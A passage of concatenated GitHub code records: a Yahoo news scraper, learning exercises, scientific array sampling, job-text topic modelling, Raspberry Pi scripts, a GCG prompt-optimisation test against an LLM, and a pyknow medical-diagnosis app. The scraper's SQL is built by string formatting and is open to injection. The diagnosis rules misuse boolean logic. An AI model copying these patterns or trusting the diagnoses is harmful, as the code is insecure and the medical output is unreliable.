break\n\ncv2.destroyAllWindows()\nvs.stop()\n","repo_name":"prime626/Lie-Detector","sub_path":"lieDetector.py","file_name":"lieDetector.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"75672386752","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport requests\nimport re\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport dateutil.parser\nimport sys\nimport pymysql\nimport datetime\nfrom time import sleep\n\n\n\ndef crawl_news_links(url, news_topic):\n\n links = []\n\n if news_topic != 'all' :\n yahoo_r = requests.get(url.format(news_topic))\n else:\n yahoo_r = requests.get(archive)\n\n yahoo_soup = BeautifulSoup(yahoo_r.text, 'html.parser')\n\n topic = yahoo_soup.find_all('div', {'class': 'Cf'})\n\n for info in topic:\n link = \"\"\n try:\n link = info.find_all('a', href=True)[0]\n if link.get('href') != '#':\n links.append(base_url + link.get(\"href\"))\n except:\n link = None\n\n print(\"News count : {}\".format(len(links))) \n \n return links\n\ndef news_parser(links):\n\n data_list = []\n pattern = re.compile(r'<[^>]*>')\n\n for link in links:\n \n try:\n news = requests.get(link)\n single_news = BeautifulSoup(news.text, 'html.parser')\n except: sleep(10)\n \n try:\n # get news titles ##########################################################\n titles = str(single_news.find_all('h1', {'class':''})[0])\n find_tags = pattern.findall(titles)\n for tag in find_tags:\n titles = titles.replace(tag, '')\n \n # get news contents ##########################################################\n content = single_news.find_all('p')\n \n p_tmp = ''\n for p in content:\n if len(p) == 1 and type(p.contents[0]).__name__ != 'Tag':\n p = str(p).replace('

    ', '')\n p = str(p).replace('

    ', '')\n p_tmp = p_tmp + p\n \n contents = p_tmp\n \n # get image ulrs ##########################################################\n i_tmp = []\n img_link = single_news.find_all('img', class_ = \"caas-img\")\n \n for image in img_link:\n i_tmp.append(image['src'])\n\n if len(i_tmp) > 1:\n images = i_tmp[-1]\n else:\n images = None\n \n if images == '':\n images = None\n \n # image = None => default images to every topics ##########################\n \n if images == None:\n \n if news_topic == 'technology':\n images = 'https://i.screenshot.net/18rp4t4'\n elif news_topic == 'sports':\n images = 'https://i.screenshot.net/qlvzpbp'\n elif news_topic == 'finance':\n images = 'https://i.screenshot.net/n3d8gtk'\n elif news_topic == 'politics':\n images = 'https://i.screenshot.net/7d12xi2'\n elif news_topic == 'entertainment':\n images = 'https://i.screenshot.net/kmy96u0'\n elif news_topic == 'health':\n images = 'https://i.screenshot.net/32o6ziq'\n \n # get news times ##########################################################\n\n time = single_news.find_all('time')\n \n for t in time:\n d = dateutil.parser.parse(t['datetime'])\n times = d.strftime('%Y-%m-%d %H:%M:%S')\n \n # news_topic -> news_topics_ch[idx]\n \n if contents == '' or contents == '更多 NOWnews 今日新聞報導' or contents == ' 更多 NOWnews 今日新聞報導' or len(contents)<15:\n print(\"this news has bkank content : \"+ str(titles))\n break\n \n data_list.append([news_topics_ch[idx], times, titles, contents, images, link])\n except:\n continue\n \n return data_list\n\ndef save_to_db(news_topic, data_list):\n conn = pymysql.connect(host=ip, user=user, passwd=passwd, db=db, charset=\"utf8\")\n cur = conn.cursor() \n \n datetime_object = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n print(datetime_object)\n\n if(len(data_list)==0):\n print(\"repeat !!!\")\n else:\n for data in data_list: # (0:news_topic, 1:times, 2:titles, 3:contents, 4:images, 5:link)\n try:\n cur.execute(\"INSERT INTO newslist (news_title, news_content, news_picture, news_url, news_topic, news_info, news_date, created_at, updated_at) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s')\" % (data[2], data[3], data[4], data[5], data[0], data[1], data[1], datetime_object, datetime_object))\n except Exception :print(\"發生異常 in insert data to db\")\n cur.close() \n conn.commit() \n conn.close() \n print(\"Save to DB successfully !!!\")\n\ndef cheacker_from_db(topic,data_list):\n today = datetime.date.today()\n oneday = datetime.timedelta(days=1)\n yesterday = today - oneday\n nextday = today + oneday+ oneday\n\n conn = pymysql.connect(host=ip, user=user, passwd=passwd, db=db, charset=\"utf8\")\n cur = conn.cursor()\n\n try:\n sql = \"SELECT news_url FROM newslist WHERE created_at >='\"+str(yesterday)+\"' AND created_at <'\"+str(nextday)+\"' AND news_topic='\"+str(topic)+\"\\'\" \n print(sql)\n cur.execute(sql)\n result = cur.fetchall()\n except Exception :print(\"發生異常 in select from db\")\n\n link_list = list()\n for one_url in result:\n link_list.append(one_url[0])\n\n if len(link_list) == 0:\n #表示裡面所有的新聞都沒有 所以要加入新的新聞\n print(\"All news are new one!\")\n return data_list\n else:\n new_data_list = []\n if(len(link_list)>0):\n for data in data_list:\n if data[5] not in link_list:\n print(\"add_new_news: \" + data[2])\n new_data_list.append(data)\n #else:\n # print(\"repeat: in now data \"+data[5])\n return new_data_list\n \ndef blank_content_checker_db():\n\n conn = pymysql.connect(host=ip, user=user, passwd=passwd, db=db, charset=\"utf8\")\n cur = conn.cursor()\n\n 
print('load data from db!')\n try:\n sql = \"SELECT news_content,news_id FROM newslist\" \n print(sql)\n cur.execute(sql)\n result = cur.fetchall()\n print('load data finished!')\n except Exception :print(\"發生異常 in select from db\")\n \n need_to_del=[] \n for one_news in result:\n print(str(one_news[1])+\" : \"+str(len(one_news[0])))\n if(len(one_news[0])<15):\n need_to_del.append(one_news[1])\n print(\"need to delete: \"+str(need_to_del))\n\ndef send_to_db(news_topics):\n idx = 0\n for news_topic in news_topics:\n print('News topic : {}'.format(news_topic))\n links = crawl_news_links(url, news_topic)\n data_list = news_parser(links)\n data_list = cheacker_from_db(news_topics_ch[idx], data_list)\n save_to_db(news_topic, data_list) \n idx = idx + 1\n \nif __name__ == \"__main__\":\n\n base_url = \"https://tw.news.yahoo.com\"\n\n #news_topics =['all_topic', 'technology', 'sports', 'finance', 'politics', 'entertainment', 'society', 'health', 'travel', 'world']\n news_topics =['technology', 'sports', 'finance', 'politics', 'entertainment','health']\n news_topics_ch =['科技', '運動', '財經', '政治', '娛樂', '健康']\n #news_topics =['technology']\n #news_topics_ch =['科技']\n\n\n url = \"https://tw.news.yahoo.com/{}/archive\"\n archive = 'https://tw.news.yahoo.com/archive' #各家新聞\n \n \n print('connect to :' + ip)\n #blank_content_checker_db()\n #send_to_db(news_topics)\n \n idx=0\n for news_topic in news_topics:\n print('News topic : {}'.format(news_topic))\n links = crawl_news_links(url, news_topic)\n data_list = news_parser(links)\n data_list = cheacker_from_db(news_topics_ch[idx], data_list)\n save_to_db(news_topic, data_list) \n idx = idx + 1\n \n","repo_name":"Alvin1216/News_Crawler","sub_path":"20191209_crawler_old.py","file_name":"20191209_crawler_old.py","file_ext":"py","file_size_in_byte":8275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42613354027","text":"'''Notion of gradient and gradient descent in machine learning'''\n\n\nimport numpy as np\nfrom tools import is_vector_valid, is_theta_valid, add_intercept\n\n\ndef simple_gradient(x, y, theta):\n \"\"\"Computes a gradient vector from three non-empty numpy.array, without any for loop.\n The three arrays must have compatible shapes.\n Args:\n x: has to be a numpy.array, a matrix of shape m * 1.\n y: has to be a numpy.array, a vector of shape m * 1.\n theta: has to be a numpy.array, a 2 * 1 vector.\n Return:\n The gradient as a numpy.ndarray, a vector of dimension 2 * 1.\n None if x, y, or theta is an empty numpy.ndarray.\n None if x, y and theta do not have compatible dimensions.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n if not is_vector_valid(x) or not is_vector_valid(y) or not is_theta_valid(theta):\n return None\n if x.size != y.size:\n return None\n x_p = add_intercept(x)\n res = np.zeros(theta.shape)\n res = (x_p.T @ ((x_p @ theta) - y))\n return res / y.size\n\n\nif __name__ == \"__main__\":\n x = np.array([12.4956442, 21.5007972, 31.5527382,\n 48.9145838, 57.5088733]).reshape((-1, 1))\n y = np.array([37.4013816, 36.1473236, 45.7655287,\n 46.6793434, 59.5585554]).reshape((-1, 1))\n # Example 0:\n theta1 = np.array([2, 0.7]).reshape((-1, 1))\n print(repr(simple_gradient(x, y, theta1)))\n # Output:\n # array([[-19.0342574], [-586.66875564]])\n # Example 1:\n theta2 = np.array([1, -0.4]).reshape((-1, 1))\n print(repr(simple_gradient(x, y, theta2)))\n # Output:\n # array([[-57.86823748], 
+{"seq_id":"7832547172","text":"import unittest\nimport sys \nimport pdb \n\nimport torch\nimport numpy as np\nfrom tqdm import tqdm \n\nimport transformers\nfrom transformers import AutoTokenizer, AutoModelForCausalLM\n\nimport magic_words\nfrom magic_words import easy_gcg_qa, easy_gcg_qa_ids\n\nclass TestEasyGCG(unittest.TestCase): \n    @classmethod \n    def setUpClass(cls):\n        \"\"\"This is run once before all tests in this class. \n        \"\"\"\n        print(\"\\n=======================================\")\n        print(\"==== Setting up TestEasyGCG class =====\")\n        print(\"=======================================\")\n\n        # Initialize a tokenizer and model\n        cls.model_name = \"tiiuae/falcon-40b\"\n\n        cls.tokenizer = AutoTokenizer.from_pretrained(cls.model_name, padding_side=\"left\")\n        cls.tokenizer.pad_token = cls.tokenizer.eos_token\n\n        cls.pipeline = transformers.pipeline(\n            \"text-generation\",\n            model=cls.model_name,\n            tokenizer=cls.tokenizer,\n            torch_dtype=torch.bfloat16,\n            trust_remote_code=True,\n            device_map=\"auto\",\n        )\n\n        cls.model = cls.pipeline.model\n        cls.model.eval()\n\n        cls.device = cls.model.device\n\n        print(\"Model device: \", cls.device)\n\n    def setUp(self):\n        \"\"\" This is run before every single individual test method.\n        \"\"\"\n        ...\n\n    def tearDown(self): \n        \"\"\"This is run after every single individual test method. \n        \"\"\"\n        ...\n\n\n    #####################\n    ### MESSAGE TESTS ###\n    #####################\n\n    def test_run(self): \n        print(\"Testing `easy_gcg()` on a simple example.\")\n        question_str = \"What is the meaning of life? \"\n        answer_str = \"42\"\n\n        num_tokens = 10\n        top_k = 128\n        max_iters = 34 \n        batch_size = 768\n        max_parallel = 101\n\n        prompt_ids = easy_gcg_qa(question_str,\n                                 answer_str,\n                                 num_tokens,\n                                 self.model,\n                                 self.tokenizer,\n                                 top_k,\n                                 batch_size=batch_size,\n                                 num_iters=max_iters,\n                                 max_parallel=max_parallel,\n                                 blacklist=[]) # just to test the blacklist\n\n        print(\"Best prompt: \", prompt_ids)\n        print(\"Decoded prompt: \", self.tokenizer.batch_decode(prompt_ids))\n\n","repo_name":"amanb2000/Magic_Words","sub_path":"tests/test_easy_gcg.py","file_name":"test_easy_gcg.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"60"}
+{"seq_id":"70393551873","text":"# COMPREHENSIONS IN PYTHON -- AN ALTERNATIVE TO FOR/WHILE LOOPS\n\n\nfrom unittest import result\n\n\nnumbers = [] # We defined an empty list. \nfor x in range(10):\n    numbers.append(x) # We added the numbers from zero up to 10 to this list.\nprint(numbers)\n\nnumbers1 = [y for y in range(10)] # A shorter way of doing the operation above.\nprint(numbers1)\n\nfor z in range(10): # We used a for loop to print the elements one by one.\n    print(z**2)\n    \nnumbers2 = [z**2 for z in range(10)] # We turned the elements into a list.\nprint(numbers2)\n\nnumbers3 = [t*t for t in range(10) if t % 3 == 0]\nprint(numbers3)\n\n\nmyString = \"Hello\"\nmyList = []\n\nfor letter in myString:\n    myList.append(letter)\nprint(myList)\n\n\nmyList = [letter for letter in myString]\nprint(myList)\n\nyears = [1983, 1999, 1956, 1986]\n\nages = [2022-year for year in years ]\nprint(ages)\n\nresults = [x if x%2 == 0 else 'tek' for x in range(10)]\nprint(results)\n\nresult = []\nfor a in range(3):\n    for b in range(3):\n        result.append((a,b))\n    \nprint(result)\n\nnumbers4 = [(x,y) for x in range(3) for y in range(3)]\nprint(numbers4)","repo_name":"fatihakblt/Python","sub_path":"List_comprehensions.py","file_name":"List_comprehensions.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"41344287508","text":"\"\"\"\n1220. Magnetic\n210126 Solution\n1. Build the transposed matrix\n2. Pull out only the values 1 and 2 with a for loop\n3. Push 1s onto a stack; when a 2 appears, count++\n\"\"\"\n\nfor tc_num in range(10):\n    rec_len = int(input())\n    arr = [[] for _ in range(rec_len)]\n    N = \"1\"\n    S = \"2\"\n    for i in range(rec_len):\n        for index, num in enumerate(input().split()):\n            arr[index].append(num)\n\n    count = 0\n    for array in arr:\n        value_list = []\n        for num in array:\n            if num == N:\n                value_list.append(num)\n            elif num == S:\n                if len(value_list):\n                    value_list = []\n                    count += 1\n    print(f\"#{tc_num+1} {count}\")\n\n\n\"\"\"\nTrial-and-error notes\n1. Tried to swap every element one by one\n2. Forgot to reset value_list at the end of each row\n\"\"\"\n","repo_name":"devejs/Algorithm","sub_path":"SWEA/swea_1220_python.py","file_name":"swea_1220_python.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"41021837120","text":"import numpy as np\nimport xarray as xr\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom pathos.threading import ThreadPool as Pool\n\ndef yearly_arrays(vt,year,sample_size=2000):\n    if (vt==1) or (vt==2) or (vt==6) or (vt==9):\n        th=format(0.90, \".2f\")\n    if (vt==3):\n        th=format(0.85, \".2f\")\n    if (vt==4) or (vt==13):\n        th=format(0.75, \".2f\")\n    if (vt==5) or (vt==16) or (vt==17):\n        th=format(0.70, \".2f\")\n    \n    th_str = str(th)\n    \n    fol='/home/vanoorschot/work/fransje/scripts/LAI_FCOVER/fittings/fitting_1km/final'\n    f = xr.open_dataset(f'{fol}/fc_lai_data/fc_lai_{year}_unst.nc')\n    lc = xr.open_dataset(f'{fol}/esacci_masked/esacci_unst_{vt}_{th}.nc')\n    \n    lc_ar = lc[f'{vt}']\n    n = np.where(~np.isnan(lc_ar))\n    \n    lat_ar = np.array([])\n    lon_ar = np.array([])\n    fc_ar = np.array([])\n    lai_ar = np.array([])\n    for k in range(36):\n        n_sel = np.random.choice(n[0],sample_size,replace=False)\n        fc_val = f.FCOVER[k,n_sel].values\n        lai_val = f.LAI[k,n_sel].values\n        lat_val = f.lat[n_sel].values\n        lon_val = f.lon[n_sel].values\n        fc_ar = np.concatenate([fc_ar, fc_val])\n        lai_ar = np.concatenate([lai_ar, lai_val])\n        lat_ar = np.concatenate([lat_ar,lat_val])\n        lon_ar = np.concatenate([lon_ar,lon_val])\n\n    # remove negative points & NAN points\n    a = np.where(fc_ar<0)[0]\n    b = np.where(lai_ar<0)[0]\n    c = np.where(np.isnan(fc_ar))[0]\n    d = np.where(np.isnan(lai_ar))[0]\n    ab = np.concatenate([a,b,c,d])\n    ab = np.sort(ab)\n    ab = np.unique(ab)\n    fc_ar = np.delete(fc_ar,ab)\n    lai_ar = np.delete(lai_ar,ab)\n    lat_ar = np.delete(lat_ar,ab)\n    lon_ar = np.delete(lon_ar,ab)\n    \n    np.save(f'{fol}/output/yearly_arrays_2000/x_{year}_{vt}_{th}.npy',lai_ar)\n    np.save(f'{fol}/output/yearly_arrays_2000/y_{year}_{vt}_{th}.npy',fc_ar)\n    np.save(f'{fol}/output/yearly_arrays_2000/lat_{year}_{vt}_{th}.npy',lat_ar)\n    np.save(f'{fol}/output/yearly_arrays_2000/lon_{year}_{vt}_{th}.npy',lon_ar)\n    \n# make lists for parallel computation\nyear_l = [2013,2014,2015,2016,2017,2018,2019]#2006,2007,2008,2009,2010,2011,2012]\n# year_list = [1999,2000,2001,2002,2003,2004,2005,2006,2007,2008,2009,2010,2011,2012,2013,2014,2015,2016,2017,2018,2019]\nvt_l = [1,2,3,4,5,6,9,13,16,17]\nvt_list = vt_l * (len(year_l))\nyear_list = year_l * len(vt_l)\nyear_list.sort()\nprint(vt_list)\nprint(year_list)\n\n#%% run function parallel\ndef run_function_parallel(vt_list=list,\n                          year_list=list,\n                          threads=200):\n    if threads is None:\n        pool = Pool()\n    else:\n        pool=Pool(nodes=threads)\n    results = pool.map(yearly_arrays,\n                       vt_list,\n                       year_list,\n                       )\n    return results\n\n# run function parallel -> do this with slurm\nrun_function_parallel(vt_list,year_list)\n","repo_name":"fvanoorschot/lai_fcover_fitting","sub_path":"final_arrays.py","file_name":"final_arrays.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
\".join([feature_names[i]\n for i in topic.argsort()[:-n_top_words - 1:-1]])\n print(message)\n print()\n\ndef make_lookup_dictionary(df, var):\n ''' Create a dictionary of job index and job variable. This will be used\n later to lookup the job information for the most similar jobs out of the\n similarity matrices.'''\n jobs_dict = {idx: title for idx, title in enumerate(df[var])}\n return jobs_dict\n\ndef get_top_jobs(cosine_matrix, jobs_dict, k):\n '''Sort the cosine similarity matrix from largest to smallest and store\n the results in a list of lists. The first item will be the job of interest.\n The remaining items will be the top k jobs associated with the job of interest.\n '''\n # top_jobs = cs_mat.argsort()[:, :-10:-1]\n top_jobs = cosine_matrix.argsort()[:, :-k - 1:-1]\n\n jobs_list = []\n for row in top_jobs:\n jobs_k = []\n for idx in row:\n jobs_k.append(jobs_dict[idx])\n jobs_list.append(jobs_k)\n return jobs_list\n\ndef softmax(v, temperature=1.0):\n '''\n A heuristic to convert arbitrary positive values into probabilities.\n See: https://en.wikipedia.org/wiki/Softmax_function\n '''\n expv = np.exp(v / temperature)\n s = np.sum(expv)\n return expv / s\n\ndef analyze_new_job(W, cluster_index):\n ''' Analyze a new job against a previously computed clustering and\n assign probabilities of belonging to each cluster.\n '''\n W = nmf.fit_transform(X)\n probs = softmax(W[article_index], temperature=0.01)\n for prob, label in zip(probs, hand_labels):\n print ('--> {:.2f}% {}'.format(prob * 100, label))\n print ()\n\ndef hand_label_topics(H, vocabulary):\n '''\n Print the most influential words of each latent topic, and prompt the user\n to label each topic. The user should use their humanness to figure out what\n each latent topic is capturing.\n '''\n hand_labels = []\n for i, row in enumerate(H):\n top_ngrams = np.argsort(row)[::-1][:20]\n print ('topic', i)\n print ('-->', ' '.join(vocabulary[top_ngrams]))\n label = raw_input('please label this topic: ')\n hand_labels.append(label)\n print ()\n return hand_labels\n\ndef create_topics(clean_text, description=None, n_gram_max=3, num_features=5000, n_topics=10, n_top_words=20):\n ''' Perform TF-IDF vectorization and feed the results into either NMF or LDA clustering.\n Print the vocabulary words associated with each cluster in order to verify that clustering\n is being performed as-expected.\n '''\n tfidf = TfidfVectorizer(tokenizer=LemmaTokenizer(), stop_words=stop_words, ngram_range=(1, n_gram_max), max_features=num_features)\n\n tfidf_model = tfidf.fit_transform(clean_text)\n vocabulary = np.array(tfidf.get_feature_names())\n\n nmf = NMF(n_components=n_topics, max_iter=max_iterations, random_state=seed, alpha=0.1)\n lda = LDA(n_components=n_topics, learning_method='batch', random_state=seed)\n\n nmf_model = nmf.fit(tfidf_model)\n lda_model = lda.fit(tfidf_model)\n\n print(\"\\nTopics in NMF model using TF-IDF Vectorizer: {}\".format(description))\n print_top_words(nmf_model, vocabulary, n_top_words)\n\n print(\"\\nTopics in LDA model using TF-IDF Vectorizer: {}\".format(description))\n print_top_words(lda_model, vocabulary, n_top_words)\n\ndef fit_nmf_model(clean_text, n_gram_max=3, num_features=5000, n_topics=10, max_iterations=100, seed=1234):\n ''' Perform TF-IDF vectorization and feed the results into either NMF or LDA clustering.\n Print the vocabulary words associated with each cluster in order to verify that clustering\n is being performed as-expected.\n '''\n stop_words = text.ENGLISH_STOP_WORDS.union({'u2019', 'u2020', 
'u2022', '\\n', '\\t', 'u', 'bull', 'nbsp'})\n\n tfidf = TfidfVectorizer(tokenizer=LemmaTokenizer(), stop_words=stop_words, ngram_range=(1, n_gram_max), max_features=num_features)\n\n tfidf_model = tfidf.fit_transform(clean_text)\n vocabulary = np.array(tfidf.get_feature_names())\n\n nmf = NMF(n_components=n_topics, max_iter=max_iterations, random_state=seed, alpha=0.1)\n W = nmf.fit_transform(tfidf_model)\n H = nmf.components_\n\n return vocabulary, W, H\n\ndef _pull_all_caps(text):\n s = ''.join([i for i in text if i not in set(punctuation + '0123456789')])\n keep_all_caps = ' '.join(word.lower() + word[1:] if not word.isupper() else word for word in s.split())\n return re.sub('[^A-Z]', '', keep_all_caps)\n\ndef pull_all_caps(df, col):\n return df[col].apply(lambda row: _pull_all_caps(row))\n # Keep words in all caps.\n\n s = ''.join([i.lower() for i in s if i not in set(punctuation + '0123456789')])\n keep_all_caps = ' '.join(word.lower() + word[1:] if not word.isupper() else word for word in string.split())\n\ndef get_stop_words():\n from sklearn.feature_extraction import text\n return text.ENGLISH_STOP_WORDS.union({'u2019', 'u2020', 'u2022', '\\n', '\\t', 'u', 'bull', 'nbsp'})\n\n# def print_word_cloud(text):\n# # lower max_font_size\n# wordcloud = WordCloud(max_font_size=40).generate(text)\n# plt.figure()\n# plt.imshow(wordcloud, interpolation=\"bilinear\")\n# plt.axis(\"off\")\n\nif __name__ == '__main__':\n seed = 1234\n n_topics = 10\n n_top_words = 25\n max_iterations = 200\n\n df = pd.read_pickle('../data/posted_jobs.pkl')\n # appsdf = pd.read_pickle('../data/jobs_with_applicants.pkl')\n\n df = df.query(\"applicationCount == 0\")\n stop_words = text.ENGLISH_STOP_WORDS.union({'u2019', 'u2020', 'u2022', '\\n', '\\t', 'u', 'bull', 'nbsp'})\n\n # create_topics(clean_descs)\n # create_topics(clean_titles, n_gram_max=2, num_features=500, n_topics=10, n_top_words=20)\n # create_topics(appsdf['major_text'], description = 'Job Majors', n_gram_max=2, num_features=500, n_topics=10, n_top_words=15)\n\n vocab, W_d, H_d = fit_nmf_model(df['desc_text'], n_gram_max=3, num_features=5000, n_topics=10)\n vocab, W_m, H_m = fit_nmf_model(df['major_text'], n_gram_max=2, num_features=500, n_topics=10)\n vocab, W_t, H_t = fit_nmf_model(df['title_text'], n_gram_max=2, num_features=500, n_topics=10)\n\n # ''' Fit the TF model to the text data '''\n # tf = CountVectorizer(tokenizer=LemmaTokenizer(), stop_words=stop_words, ngram_range=(1, 3), max_features=5000)\n","repo_name":"dedstrom611/spotified_job_search","sub_path":"src/jobtext_processing.py","file_name":"jobtext_processing.py","file_ext":"py","file_size_in_byte":8434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10849807285","text":"from setuptools import find_packages, setup\n\npackage_name = 'rpi_pc_talk'\n\nsetup(\n name=package_name,\n version='0.0.0',\n packages=find_packages(exclude=['test']),\n data_files=[\n ('share/ament_index/resource_index/packages',\n ['resource/' + package_name]),\n ('share/' + package_name, ['package.xml']),\n ],\n install_requires=['setuptools'],\n zip_safe=True,\n maintainer='jlukas',\n maintainer_email='jlukas@todo.todo',\n description='TODO: Package description',\n license='TODO: License declaration',\n tests_require=['pytest'],\n entry_points={\n 'console_scripts': [\n 'publisher = rpi_pc_talk.publisher:main',\n 'subscriber = rpi_pc_talk.subscriber:main'\n ],\n 
},\n)\n","repo_name":"develtechmon/ROS2","sub_path":"rpi_pc_talk/src/rpi_pc_talk/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21323459386","text":"import Adafruit_DHT\nimport time\n\n# Sensor should be set to Adafruit_DHT.DHT11,\n# Adafruit_DHT.DHT22, or Adafruit_DHT.AM2302.\nsensor = Adafruit_DHT.DHT11\n\n# Example using a Beaglebone Black with DHT sensor\n# connected to pin P8_11.\n#pin = 'P8_11'\n\n# Example using a Raspberry Pi with DHT sensor\n# connected to GPIO23.\npin = 14\n\nals = True\nwhile als:\n # Try to grab a sensor reading. Use the read_retry method which will retry up\n # to 15 times to get a sensor reading (waiting 2 seconds between each retry).\n humidity, temperature = Adafruit_DHT.read_retry(sensor, pin)\n\n # Note that sometimes you won't get a reading and\n # the results will be null (because Linux can't\n # guarantee the timing of calls to read the sensor).\n # If this happens try again!\n\n\n if humidity is not None and temperature is not None:\n print('Temp={0:0.1f}*C Humidity={1:0.1f}%'.format(temperature, humidity))\n else:\n print('Failed to get reading. Try again!!')\n time.sleep(60)\n","repo_name":"solacese/RaspberryPi-Solace-SCADA","sub_path":"publish/simpletest.py","file_name":"simpletest.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"75258792512","text":"import socket\nimport RPi.GPIO as GPIO\n\nvar=0\nhost = \"192.168.1.41\"\nport = 8080\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.bind((host,port))\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(33,GPIO.OUT)\np = GPIO.PWM(33,50)\np.start(0)\n\nwhile(1):\n var=sock.recvfrom(1024)\n var=(float(var[0]))\n print (var)\n p.ChangeDutyCycle(var)\n\np.stop()\nGPIO.cleanup()\n\n","repo_name":"chinmayupadhyay1/IOT-IITK-test-codes-","sub_path":"from_pot_to_adno_to_RPi_to_LED.py","file_name":"from_pot_to_adno_to_RPi_to_LED.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42285916539","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jan 22 16:06:39 2019\n@author: Cumbe\n\"\"\"\n\nfrom firebase import firebase\nfrom flask import Flask, render_template, request\nfrom flask_bootstrap import Bootstrap\nfrom pyknow import * \n\napp = Flask(__name__)\nBootstrap(app)\n\ndef get_connection():\n data = firebase.FirebaseApplication('https://diagnostico-1f675.firebaseio.com/', None)\n return data\n \n\ndef get_Gripa():\n con = get_connection()\n dataset = con.get('/Enfermedades/0', None)\n return dataset\ndef get_GripaSint():\n con = get_connection()\n dataset = con.get('/Enfermedades/0/Sintomas', None)\n return dataset\n\ndef get_Neumonia():\n con = get_connection()\n dataset = con.get('/Enfermedades/1', None)\n return dataset\ndef get_NeumoniaSint():\n con = get_connection()\n dataset = con.get('/Enfermedades/1/Sintomas', None)\n return dataset\n\ndef get_Tuberculosis():\n con = get_connection()\n dataset = con.get('/Enfermedades/2', None)\n return dataset\ndef get_TuberculosisSint():\n con = get_connection()\n dataset = con.get('/Enfermedades/2/Sintomas', None)\n return dataset\n\ndef get_Diabetes():\n con = get_connection()\n dataset = con.get('/Enfermedades/3', None)\n return dataset\ndef get_DiabetesSint():\n con = get_connection()\n 
dataset = con.get('/Enfermedades/3/Sintomas', None)\n return dataset\n\ndef get_Gastritis():\n con = get_connection()\n dataset = con.get('/Enfermedades/4', None)\n return dataset\ndef get_GastritisSint():\n con = get_connection()\n dataset = con.get('/Enfermedades/4/Sintomas', None)\n return dataset\n\nclass Sintoma(Fact):\n pass\n\nclass Enfermedad(Fact):\n pass\n\nGripa = get_Gripa()\nGripaSint = get_GripaSint()\n\ne100 = Gripa['100']\ns101 = GripaSint['101']\ns102 = GripaSint['102']\ns103 = GripaSint['103']\ns104 = GripaSint['104']\ns105 = GripaSint['105']\n\n\nNeumonia = get_Neumonia()\nNeumoniaSint = get_NeumoniaSint()\n\ne200 = Neumonia['200']\ns201 = NeumoniaSint['201']\ns202 = NeumoniaSint['202']\ns203 = NeumoniaSint['203']\ns204 = NeumoniaSint['204']\ns205 = NeumoniaSint['205']\n\nTuberculosis = get_Tuberculosis()\nTuberculosisSint = get_TuberculosisSint()\n\ne300 = Tuberculosis['300']\ns301 = TuberculosisSint['301']\ns302 = TuberculosisSint['302']\ns303 = TuberculosisSint['303']\ns304 = TuberculosisSint['304']\ns305 = TuberculosisSint['305']\n\nDiabetes = get_Diabetes()\nDiabetesSint = get_DiabetesSint()\n\ne400 = Diabetes['400']\ns401 = DiabetesSint['401']\ns402 = DiabetesSint['402']\ns403 = DiabetesSint['403']\ns404 = DiabetesSint['404']\ns405 = DiabetesSint['405']\n\nGastritis = get_Gastritis()\nGastritisSint = get_GastritisSint()\n\ne500 = Gastritis['500']\ns501 = GastritisSint['501']\ns502 = GastritisSint['502']\ns503 = GastritisSint['503']\ns504 = GastritisSint['504']\ns505 = GastritisSint['505']\n\nclass DiagnosticoEnfermedades(KnowledgeEngine):\n \n \n @Rule(Sintoma(descripcion= s101 and s102 or s103 or s104 or s105 or s504 or s304 or s202 or s303))\n def enfermedad_1(self):\n self.declare(Enfermedad(codigo=100, tipo=e100)) \n \n \n \n @Rule(Sintoma(descripcion= s201 and s202 or s203 or s204 or s205 or s301 or s504 or s303 or s102))\n def enfermedad_2(self):\n self.declare(Enfermedad(codigo=200, tipo=e200)) \n \n \n \n @Rule(Sintoma(descripcion= s301 and s302 or s303 or s304 or s305 or s504 or s104 or s201 or s202))\n def enfermedad_3(self):\n self.declare(Enfermedad(codigo=300, tipo=e300)) \n \n \n \n @Rule(Sintoma(descripcion= s401 and s402 or s403 or s404 or s405))\n def enfermedad_4(self):\n self.declare(Enfermedad(codigo=400, tipo=e400))\n \n \n \n @Rule(Sintoma(descripcion= s501 and s502 or s503 or s504 or s505 or s305 or s102 or s303 or s202))\n def enfermedad_5(self):\n self.declare(Enfermedad(codigo=500, tipo=e500)) \n \n\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n\n@app.route('/diagnostico', methods=['POST'])\ndef Diagnostico():\n \n sinto1 = request.form['sint1']\n\n\n sinto2 = request.form['sint2']\n\n \n sinto3 = request.form['sint3']\n\n \n sinto4 = request.form['sint4']\n \n\n sinto5 = request.form['sint5']\n\n \n print('===============================================================================================')\n print(sinto1)\n print(sinto2)\n print(sinto3)\n print(sinto4)\n print(sinto5)\n 